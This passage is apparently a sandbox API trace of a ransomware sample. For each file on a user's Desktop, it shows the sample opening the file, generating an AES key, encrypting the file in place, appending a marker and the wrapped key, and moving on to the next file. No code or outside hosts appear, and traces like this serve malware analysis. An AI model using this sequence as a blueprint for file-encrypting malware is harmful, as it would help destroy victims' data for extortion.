HALPmcxz\\Desktop\\DL6V6qq-b6O_8Foo5Q6l.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dl6v6qq-b6o_8foo5q6l.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.169] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=85388) returned 1 [0151.169] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=85388) returned 1 [0151.170] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x14c6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.170] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.170] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.170] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.170] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.171] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.171] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x14d8c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x14d8c, lpOverlapped=0x0) returned 1 [0151.182] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.182] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x14d8c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x14d90) returned 1 [0151.182] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.182] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14d90, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x14d90, lpOverlapped=0x0) returned 1 [0151.183] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.183] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.183] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.183] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.183] CloseHandle (hObject=0x188) returned 1 [0151.197] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.201] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.201] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.201] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.201] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.202] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DU6_RAZILLz.m4a", dwFileAttributes=0x80) returned 1 [0151.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DU6_RAZILLz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\du6_razillz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.202] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=86868) returned 1 [0151.202] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=86868) returned 1 [0151.202] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x15232, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.202] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.203] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.203] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.203] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.203] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.203] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x15354, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x15354, lpOverlapped=0x0) returned 1 [0151.204] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.204] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x15354, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x15360) returned 1 [0151.205] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.205] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15360, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x15360, lpOverlapped=0x0) returned 1 [0151.205] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.205] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.205] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.205] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.205] CloseHandle (hObject=0x188) returned 1 [0151.220] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.224] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.224] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.224] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.224] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ERmBWfYrxHwauKNw3O7.jpg", dwFileAttributes=0x80) returned 1 [0151.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ERmBWfYrxHwauKNw3O7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ermbwfyrxhwauknw3o7.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.225] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=32421) returned 1 [0151.225] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=32421) returned 1 [0151.225] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x7d83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.225] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.226] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.226] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.226] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.226] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.226] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7ea5, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x7ea5, lpOverlapped=0x0) returned 1 [0151.226] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.226] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x7ea5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x7eb0) returned 1 [0151.227] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.227] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7eb0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x7eb0, lpOverlapped=0x0) returned 1 [0151.227] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.227] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.227] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.227] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.227] CloseHandle (hObject=0x188) returned 1 [0151.243] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.247] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.247] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.247] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f2Cq.jpg", dwFileAttributes=0x80) returned 1 [0151.248] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f2Cq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f2cq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.248] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=64892) returned 1 [0151.248] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=64892) returned 1 [0151.248] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfc5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.248] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.249] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.249] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.249] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.249] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.249] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xfd7c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xfd7c, lpOverlapped=0x0) returned 1 [0151.250] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.250] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xfd7c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xfd80) returned 1 [0151.250] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.250] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xfd80, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xfd80, lpOverlapped=0x0) returned 1 [0151.250] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.251] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.251] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.251] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.251] CloseHandle (hObject=0x188) returned 1 [0151.266] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.270] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.270] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.270] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.270] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.270] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GiG84a.ots", dwFileAttributes=0x80) returned 1 [0151.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GiG84a.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gig84a.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.271] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=5005) returned 1 [0151.271] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=5005) returned 1 [0151.271] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x126b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.272] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.272] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.272] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.272] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.272] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x138d, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x138d, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.272] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x138d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x1390) returned 1 [0151.272] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.272] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x1390, lpOverlapped=0x0) returned 1 [0151.272] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.272] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.272] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.272] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.272] CloseHandle (hObject=0x188) returned 1 [0151.289] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.293] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.293] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.293] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.293] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gU5oHn5vtw8.mp3", dwFileAttributes=0x80) returned 1 [0151.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gU5oHn5vtw8.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gu5ohn5vtw8.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.294] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=46511) returned 1 [0151.294] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=46511) returned 1 [0151.294] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xb48d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.295] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.295] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.295] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.295] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.295] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb5af, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xb5af, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.307] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xb5af, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xb5b0) returned 1 [0151.308] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.308] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb5b0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xb5b0, lpOverlapped=0x0) returned 1 [0151.308] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.308] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.308] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.308] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.308] CloseHandle (hObject=0x188) returned 1 [0151.324] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.328] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.328] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.328] FindNextFileW (in: 